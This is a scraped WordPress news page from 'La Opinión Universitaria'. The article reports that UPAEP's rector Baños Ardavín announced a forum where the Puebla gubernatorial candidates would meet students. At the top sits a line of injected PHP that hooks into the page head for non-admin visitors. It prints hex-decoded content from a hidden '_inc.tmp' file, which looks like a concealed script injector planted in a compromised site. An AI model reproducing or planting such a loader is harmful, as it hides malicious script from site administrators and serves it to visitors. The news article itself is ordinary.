if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Encuentro de Candidatos en la UPAEP anuncia rector Baños Ardavín – La Opinión Universitaria La Opinión Universitaria
Menu

Encuentro de Candidatos en la UPAEP anuncia rector Baños Ardavín

 

  • Los alumnos podrán realizar cuestionamientos

Por Diego Cuautle

El rector de la Universidad Popular Autónoma del Estado de Puebla (UPAEP) anunció el ´Encuentro de Candidatos´ a la gubernatura del Estado con la comunidad universitaria que tiene como objetivo de que den a conocer sus propuestas, su plataforma política y de gobierno.

Lo anterior luego de la inauguración del Panel: Aterrizaje Lunar ¿Real o No?, el académico dijo será a finales de mes cuando la institución que representa reciba a los 3 personajes aunque hasta el momento solo de dos de ellos han confirmado su participación.

“Son muy importantes este tipo de foros para plantear las propuestas concretas ante las problemáticas que enfrenta Puebla; más allá de simples frases, se pide que exista la oportunidad de informar los cómos para enfrentar temas de inseguridad”, comentó en breve entrevista.

En este sentido, agregó que además de conocer que se hará, qué se aprovechará y qué recursos se usarán para fundamentar tales propuestas. Las visitas dijo, serán de manera individual y estarán presentes los alumnos de la institución quienes además podrán realizar cuestionamientos.

Al ser cuestionado sobre las campañas electorales de los tres candidatos en la disputa, Baños Ardavín comentó que los ciudadanos deben valorar correctamente las propuestas de Miguel Barbosa Huerta, Enrique Cárdenas y Alberto Jiménez Merino.

“Hay condiciones para que se dé una elección diferente a lo que vimos el año pasado, pues desde el principio se tuvo claridad de quién encabeza la contienda y de las percepciones de la gente”, agregó.

Finalmente dijo que gracias al esfuerzo conjunto entre distintos actores sociales, como empresarios y líderes de universidades, se organizará un “Debate ciudadano” el cual se espera que sea realice el 9 de mayo.

 

 

 

  • No comments

    Deja una respuesta

    Tweets recientes